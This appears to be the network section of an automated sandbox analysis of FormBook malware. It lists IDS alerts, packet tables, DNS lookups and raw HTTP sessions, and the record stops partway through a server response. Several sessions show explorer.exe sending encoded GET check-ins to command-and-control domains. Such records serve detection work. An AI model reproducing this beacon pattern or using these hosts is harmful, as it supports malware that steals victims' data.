01/31/22-09:05:07.420793	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49797	80	192.168.2.3	54.203.72.218
01/31/22-09:05:13.332821	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49798	80	192.168.2.3	183.181.96.116
01/31/22-09:05:13.332821	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49798	80	192.168.2.3	183.181.96.116
01/31/22-09:05:13.332821	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49798	80	192.168.2.3	183.181.96.116
01/31/22-09:05:24.398968	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49808	34.102.136.180	192.168.2.3

Network Port Distribution

Total Packets: 47
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 31, 2022 09:04:29.407315016 CET	49756	80	192.168.2.3	192.185.16.42
Jan 31, 2022 09:04:29.545351982 CET	80	49756	192.185.16.42	192.168.2.3
Jan 31, 2022 09:04:29.545449018 CET	49756	80	192.168.2.3	192.185.16.42
Jan 31, 2022 09:04:29.545583963 CET	49756	80	192.168.2.3	192.185.16.42
Jan 31, 2022 09:04:29.683597088 CET	80	49756	192.185.16.42	192.168.2.3
Jan 31, 2022 09:04:30.057611942 CET	49756	80	192.168.2.3	192.185.16.42
Jan 31, 2022 09:04:30.235735893 CET	80	49756	192.185.16.42	192.168.2.3
Jan 31, 2022 09:04:31.877367020 CET	80	49756	192.185.16.42	192.168.2.3
Jan 31, 2022 09:04:31.877460003 CET	49756	80	192.168.2.3	192.185.16.42
Jan 31, 2022 09:04:31.877563953 CET	80	49756	192.185.16.42	192.168.2.3
Jan 31, 2022 09:04:31.877626896 CET	49756	80	192.168.2.3	192.185.16.42
Jan 31, 2022 09:04:35.108280897 CET	49758	80	192.168.2.3	192.64.118.79
Jan 31, 2022 09:04:35.270486116 CET	80	49758	192.64.118.79	192.168.2.3
Jan 31, 2022 09:04:35.270621061 CET	49758	80	192.168.2.3	192.64.118.79
Jan 31, 2022 09:04:35.270782948 CET	49758	80	192.168.2.3	192.64.118.79
Jan 31, 2022 09:04:35.433558941 CET	80	49758	192.64.118.79	192.168.2.3
Jan 31, 2022 09:04:35.433584929 CET	80	49758	192.64.118.79	192.168.2.3
Jan 31, 2022 09:04:35.433845043 CET	49758	80	192.168.2.3	192.64.118.79
Jan 31, 2022 09:04:35.433908939 CET	49758	80	192.168.2.3	192.64.118.79
Jan 31, 2022 09:04:35.595683098 CET	80	49758	192.64.118.79	192.168.2.3
Jan 31, 2022 09:04:40.566291094 CET	49759	80	192.168.2.3	198.46.81.209
Jan 31, 2022 09:04:40.702137947 CET	80	49759	198.46.81.209	192.168.2.3
Jan 31, 2022 09:04:40.704790115 CET	49759	80	192.168.2.3	198.46.81.209
Jan 31, 2022 09:04:40.704832077 CET	49759	80	192.168.2.3	198.46.81.209
Jan 31, 2022 09:04:40.840656042 CET	80	49759	198.46.81.209	192.168.2.3
Jan 31, 2022 09:04:40.842850924 CET	80	49759	198.46.81.209	192.168.2.3
Jan 31, 2022 09:04:40.843000889 CET	80	49759	198.46.81.209	192.168.2.3
Jan 31, 2022 09:04:40.844611883 CET	49759	80	192.168.2.3	198.46.81.209
Jan 31, 2022 09:04:40.850831032 CET	49759	80	192.168.2.3	198.46.81.209
Jan 31, 2022 09:04:40.986666918 CET	80	49759	198.46.81.209	192.168.2.3
Jan 31, 2022 09:04:45.922544956 CET	49761	80	192.168.2.3	52.49.198.28
Jan 31, 2022 09:04:45.968529940 CET	80	49761	52.49.198.28	192.168.2.3
Jan 31, 2022 09:04:45.968745947 CET	49761	80	192.168.2.3	52.49.198.28
Jan 31, 2022 09:04:45.969099998 CET	49761	80	192.168.2.3	52.49.198.28
Jan 31, 2022 09:04:46.014622927 CET	80	49761	52.49.198.28	192.168.2.3
Jan 31, 2022 09:04:46.014653921 CET	80	49761	52.49.198.28	192.168.2.3
Jan 31, 2022 09:04:46.014669895 CET	80	49761	52.49.198.28	192.168.2.3
Jan 31, 2022 09:04:46.014878988 CET	49761	80	192.168.2.3	52.49.198.28
Jan 31, 2022 09:04:46.014959097 CET	49761	80	192.168.2.3	52.49.198.28
Jan 31, 2022 09:04:46.060463905 CET	80	49761	52.49.198.28	192.168.2.3
Jan 31, 2022 09:04:51.079128981 CET	49767	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:04:51.095510960 CET	80	49767	34.102.136.180	192.168.2.3
Jan 31, 2022 09:04:51.095659971 CET	49767	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:04:51.095798969 CET	49767	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:04:51.111952066 CET	80	49767	34.102.136.180	192.168.2.3
Jan 31, 2022 09:04:51.276999950 CET	80	49767	34.102.136.180	192.168.2.3
Jan 31, 2022 09:04:51.277030945 CET	80	49767	34.102.136.180	192.168.2.3
Jan 31, 2022 09:04:51.277203083 CET	49767	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:04:51.277261972 CET	49767	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:04:51.762505054 CET	49767	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:04:51.781353951 CET	80	49767	34.102.136.180	192.168.2.3
Jan 31, 2022 09:04:56.418404102 CET	49795	80	192.168.2.3	45.144.154.230
Jan 31, 2022 09:04:56.469609976 CET	80	49795	45.144.154.230	192.168.2.3
Jan 31, 2022 09:04:56.469799042 CET	49795	80	192.168.2.3	45.144.154.230
Jan 31, 2022 09:04:56.470235109 CET	49795	80	192.168.2.3	45.144.154.230
Jan 31, 2022 09:04:56.521169901 CET	80	49795	45.144.154.230	192.168.2.3
Jan 31, 2022 09:04:56.521265030 CET	80	49795	45.144.154.230	192.168.2.3
Jan 31, 2022 09:04:56.521372080 CET	80	49795	45.144.154.230	192.168.2.3
Jan 31, 2022 09:04:56.521529913 CET	49795	80	192.168.2.3	45.144.154.230
Jan 31, 2022 09:04:56.521812916 CET	49795	80	192.168.2.3	45.144.154.230
Jan 31, 2022 09:04:56.572743893 CET	80	49795	45.144.154.230	192.168.2.3
Jan 31, 2022 09:05:01.744697094 CET	49796	80	192.168.2.3	103.224.182.241
Jan 31, 2022 09:05:01.904999018 CET	80	49796	103.224.182.241	192.168.2.3
Jan 31, 2022 09:05:01.905136108 CET	49796	80	192.168.2.3	103.224.182.241
Jan 31, 2022 09:05:01.905292988 CET	49796	80	192.168.2.3	103.224.182.241
Jan 31, 2022 09:05:02.097158909 CET	80	49796	103.224.182.241	192.168.2.3
Jan 31, 2022 09:05:02.097476006 CET	49796	80	192.168.2.3	103.224.182.241
Jan 31, 2022 09:05:02.097625017 CET	49796	80	192.168.2.3	103.224.182.241
Jan 31, 2022 09:05:02.257759094 CET	80	49796	103.224.182.241	192.168.2.3
Jan 31, 2022 09:05:07.237569094 CET	49797	80	192.168.2.3	54.203.72.218
Jan 31, 2022 09:05:07.420101881 CET	80	49797	54.203.72.218	192.168.2.3
Jan 31, 2022 09:05:07.420419931 CET	49797	80	192.168.2.3	54.203.72.218
Jan 31, 2022 09:05:07.420793056 CET	49797	80	192.168.2.3	54.203.72.218
Jan 31, 2022 09:05:07.603271008 CET	80	49797	54.203.72.218	192.168.2.3
Jan 31, 2022 09:05:07.743268013 CET	80	49797	54.203.72.218	192.168.2.3
Jan 31, 2022 09:05:07.743292093 CET	80	49797	54.203.72.218	192.168.2.3
Jan 31, 2022 09:05:07.743494034 CET	49797	80	192.168.2.3	54.203.72.218
Jan 31, 2022 09:05:07.743628025 CET	49797	80	192.168.2.3	54.203.72.218
Jan 31, 2022 09:05:07.926314116 CET	80	49797	54.203.72.218	192.168.2.3
Jan 31, 2022 09:05:24.262917042 CET	49808	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:05:24.281382084 CET	80	49808	34.102.136.180	192.168.2.3
Jan 31, 2022 09:05:24.281677008 CET	49808	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:05:24.281737089 CET	49808	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:05:24.299835920 CET	80	49808	34.102.136.180	192.168.2.3
Jan 31, 2022 09:05:24.398967981 CET	80	49808	34.102.136.180	192.168.2.3
Jan 31, 2022 09:05:24.399008989 CET	80	49808	34.102.136.180	192.168.2.3
Jan 31, 2022 09:05:24.399280071 CET	49808	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:05:24.404546022 CET	49808	80	192.168.2.3	34.102.136.180
Jan 31, 2022 09:05:24.422523022 CET	80	49808	34.102.136.180	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 31, 2022 09:04:29.178704023 CET	51143	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:04:29.388952017 CET	53	51143	8.8.8.8	192.168.2.3
Jan 31, 2022 09:04:35.077373981 CET	56009	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:04:35.107192039 CET	53	56009	8.8.8.8	192.168.2.3
Jan 31, 2022 09:04:40.454751968 CET	59026	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:04:40.562912941 CET	53	59026	8.8.8.8	192.168.2.3
Jan 31, 2022 09:04:45.883399963 CET	49572	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:04:45.921318054 CET	53	49572	8.8.8.8	192.168.2.3
Jan 31, 2022 09:04:51.034039021 CET	56527	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:04:51.054331064 CET	53	56527	8.8.8.8	192.168.2.3
Jan 31, 2022 09:04:56.290420055 CET	53615	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:04:56.416889906 CET	53	53615	8.8.8.8	192.168.2.3
Jan 31, 2022 09:05:01.573687077 CET	50728	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:05:01.743073940 CET	53	50728	8.8.8.8	192.168.2.3
Jan 31, 2022 09:05:07.113415956 CET	53777	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:05:07.236247063 CET	53	53777	8.8.8.8	192.168.2.3
Jan 31, 2022 09:05:12.760114908 CET	57106	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:05:13.013664007 CET	53	57106	8.8.8.8	192.168.2.3
Jan 31, 2022 09:05:18.849952936 CET	60352	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:05:18.887341976 CET	53	60352	8.8.8.8	192.168.2.3
Jan 31, 2022 09:05:24.241550922 CET	60982	53	192.168.2.3	8.8.8.8
Jan 31, 2022 09:05:24.262393951 CET	53	60982	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 31, 2022 09:04:29.178704023 CET	192.168.2.3	8.8.8.8	0xd4ce	Standard query (0)	www.sharingtechnology.net	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:35.077373981 CET	192.168.2.3	8.8.8.8	0x6325	Standard query (0)	www.safepostcourier.com	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:40.454751968 CET	192.168.2.3	8.8.8.8	0x9fc4	Standard query (0)	www.mindfulagilecoaching.com	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:45.883399963 CET	192.168.2.3	8.8.8.8	0x9f7	Standard query (0)	www.bethesdagardensloveland.com	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:51.034039021 CET	192.168.2.3	8.8.8.8	0x94d6	Standard query (0)	www.theangularteam.com	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:56.290420055 CET	192.168.2.3	8.8.8.8	0x1405	Standard query (0)	www.zenginbilgiler.com	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:01.573687077 CET	192.168.2.3	8.8.8.8	0x2393	Standard query (0)	www.pawastreams.com	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:07.113415956 CET	192.168.2.3	8.8.8.8	0x1d50	Standard query (0)	www.bestpicture-toglancetoday.info	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:12.760114908 CET	192.168.2.3	8.8.8.8	0x1522	Standard query (0)	www.moneylovepig.com	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:18.849952936 CET	192.168.2.3	8.8.8.8	0x5d91	Standard query (0)	www.rezzo-jazzavienne.com	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:24.241550922 CET	192.168.2.3	8.8.8.8	0x44f	Standard query (0)	www.partumball.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 31, 2022 09:04:29.388952017 CET	8.8.8.8	192.168.2.3	0xd4ce	No error (0)	www.sharingtechnology.net	sharingtechnology.net		CNAME (Canonical name)	IN (0x0001)
Jan 31, 2022 09:04:29.388952017 CET	8.8.8.8	192.168.2.3	0xd4ce	No error (0)	sharingtechnology.net		192.185.16.42	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:35.107192039 CET	8.8.8.8	192.168.2.3	0x6325	No error (0)	www.safepostcourier.com	safepostcourier.com		CNAME (Canonical name)	IN (0x0001)
Jan 31, 2022 09:04:35.107192039 CET	8.8.8.8	192.168.2.3	0x6325	No error (0)	safepostcourier.com		192.64.118.79	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:40.562912941 CET	8.8.8.8	192.168.2.3	0x9fc4	No error (0)	www.mindfulagilecoaching.com	mindfulagilecoaching.com		CNAME (Canonical name)	IN (0x0001)
Jan 31, 2022 09:04:40.562912941 CET	8.8.8.8	192.168.2.3	0x9fc4	No error (0)	mindfulagilecoaching.com		198.46.81.209	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:45.921318054 CET	8.8.8.8	192.168.2.3	0x9f7	No error (0)	www.bethesdagardensloveland.com	proxy-ssl.webflow.com		CNAME (Canonical name)	IN (0x0001)
Jan 31, 2022 09:04:45.921318054 CET	8.8.8.8	192.168.2.3	0x9f7	No error (0)	proxy-ssl.webflow.com	proxy-ssl-geo.webflow.com		CNAME (Canonical name)	IN (0x0001)
Jan 31, 2022 09:04:45.921318054 CET	8.8.8.8	192.168.2.3	0x9f7	No error (0)	proxy-ssl-geo.webflow.com		52.49.198.28	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:45.921318054 CET	8.8.8.8	192.168.2.3	0x9f7	No error (0)	proxy-ssl-geo.webflow.com		3.248.8.137	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:45.921318054 CET	8.8.8.8	192.168.2.3	0x9f7	No error (0)	proxy-ssl-geo.webflow.com		52.212.43.230	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:51.054331064 CET	8.8.8.8	192.168.2.3	0x94d6	No error (0)	www.theangularteam.com	theangularteam.com		CNAME (Canonical name)	IN (0x0001)
Jan 31, 2022 09:04:51.054331064 CET	8.8.8.8	192.168.2.3	0x94d6	No error (0)	theangularteam.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 31, 2022 09:04:56.416889906 CET	8.8.8.8	192.168.2.3	0x1405	No error (0)	www.zenginbilgiler.com	zenginbilgiler.com		CNAME (Canonical name)	IN (0x0001)
Jan 31, 2022 09:04:56.416889906 CET	8.8.8.8	192.168.2.3	0x1405	No error (0)	zenginbilgiler.com		45.144.154.230	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:01.743073940 CET	8.8.8.8	192.168.2.3	0x2393	No error (0)	www.pawastreams.com		103.224.182.241	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:07.236247063 CET	8.8.8.8	192.168.2.3	0x1d50	No error (0)	www.bestpicture-toglancetoday.info		54.203.72.218	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:07.236247063 CET	8.8.8.8	192.168.2.3	0x1d50	No error (0)	www.bestpicture-toglancetoday.info		52.200.164.252	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:13.013664007 CET	8.8.8.8	192.168.2.3	0x1522	No error (0)	www.moneylovepig.com		183.181.96.116	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:18.887341976 CET	8.8.8.8	192.168.2.3	0x5d91	No error (0)	www.rezzo-jazzavienne.com		195.15.216.57	A (IP address)	IN (0x0001)
Jan 31, 2022 09:05:24.262393951 CET	8.8.8.8	192.168.2.3	0x44f	No error (0)	www.partumball.com	partumball.com		CNAME (Canonical name)	IN (0x0001)
Jan 31, 2022 09:05:24.262393951 CET	8.8.8.8	192.168.2.3	0x44f	No error (0)	partumball.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.sharingtechnology.net

www.safepostcourier.com

www.mindfulagilecoaching.com

www.bethesdagardensloveland.com

www.theangularteam.com

www.zenginbilgiler.com

www.pawastreams.com

www.bestpicture-toglancetoday.info

www.partumball.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49756	192.185.16.42	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 31, 2022 09:04:29.545583963 CET	8976	OUT	GET /ndf8/?r48X=BfPqRrZi1Nvegs+cj2EDIZW0ahYu65pOTruxY8XtQ+p4cMRjfZYnI7scWEyi9dGt37iK&ihe4W=5jMxZX HTTP/1.1 Host: www.sharingtechnology.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 31, 2022 09:04:31.877367020 CET	9734	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 31 Jan 2022 08:04:31 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://sharingtechnology.net/ndf8/?r48X=BfPqRrZi1Nvegs+cj2EDIZW0ahYu65pOTruxY8XtQ+p4cMRjfZYnI7scWEyi9dGt37iK&ihe4W=5jMxZX X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49758	192.64.118.79	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 31, 2022 09:04:35.270782948 CET	9734	OUT	GET /ndf8/?r48X=Jkb3qULodAPsbwEkWvkNxdGDgcgioern+VdRvmK2C6x/Zi+k8aFahwHydMBBXChJ4TlK&ihe4W=5jMxZX HTTP/1.1 Host: www.safepostcourier.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 31, 2022 09:04:35.433558941 CET	9735	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Mon, 31 Jan 2022 08:04:35 GMT server: LiteSpeed location: https://www.safepostcourier.com/ndf8/?r48X=Jkb3qULodAPsbwEkWvkNxdGDgcgioern+VdRvmK2C6x/Zi+k8aFahwHydMBBXChJ4TlK&ihe4W=5jMxZX x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49759	198.46.81.209	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 31, 2022 09:04:40.704832077 CET	9736	OUT	GET /ndf8/?r48X=P14lpjMoYzWbnBnDYYNCg6ClQxLmCCxAShWV0WGNcgOa+TLBjJIe66h8Y64JomzHb8Hi&ihe4W=5jMxZX HTTP/1.1 Host: www.mindfulagilecoaching.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 31, 2022 09:04:40.842850924 CET	9737	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 31 Jan 2022 08:04:40 GMT Server: Apache Location: https://sean-gonzalez.com/ndf8/?r48X=P14lpjMoYzWbnBnDYYNCg6ClQxLmCCxAShWV0WGNcgOa+TLBjJIe66h8Y64JomzHb8Hi&ihe4W=5jMxZX Content-Length: 330 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 65 61 6e 2d 67 6f 6e 7a 61 6c 65 7a 2e 63 6f 6d 2f 6e 64 66 38 2f 3f 72 34 38 58 3d 50 31 34 6c 70 6a 4d 6f 59 7a 57 62 6e 42 6e 44 59 59 4e 43 67 36 43 6c 51 78 4c 6d 43 43 78 41 53 68 57 56 30 57 47 4e 63 67 4f 61 2b 54 4c 42 6a 4a 49 65 36 36 68 38 59 36 34 4a 6f 6d 7a 48 62 38 48 69 26 61 6d 70 3b 69 68 65 34 57 3d 35 6a 4d 78 5a 58 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://sean-gonzalez.com/ndf8/?r48X=P14lpjMoYzWbnBnDYYNCg6ClQxLmCCxAShWV0WGNcgOa+TLBjJIe66h8Y64JomzHb8Hi&ihe4W=5jMxZX">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49761	52.49.198.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 31, 2022 09:04:45.969099998 CET	9743	OUT	GET /ndf8/?r48X=ivAFo0A+NqvrlfwHnO69DiIiTNfvi2ac6XE5GsUcPQCQwjrhO7vznBZ3k8qerGpNfj8C&ihe4W=5jMxZX HTTP/1.1 Host: www.bethesdagardensloveland.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 31, 2022 09:04:46.014653921 CET	9743	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Mon, 31 Jan 2022 08:04:45 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.bethesdagardensloveland.com/ndf8?r48X=ivAFo0A+NqvrlfwHnO69DiIiTNfvi2ac6XE5GsUcPQCQwjrhO7vznBZ3k8qerGpNfj8C&ihe4W=5jMxZX Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49767	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 31, 2022 09:04:51.095798969 CET	9962	OUT	GET /ndf8/?r48X=UDlWqClyQYAxvw1qhQyotXnG6StVuzlosSzrK5RtNenfTIGzfkaW05z+heFbWRXNUIb8&ihe4W=5jMxZX HTTP/1.1 Host: www.theangularteam.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 31, 2022 09:04:51.276999950 CET	9964	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 31 Jan 2022 08:04:51 GMT Content-Type: text/html Content-Length: 275 ETag: "61f5decc-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE 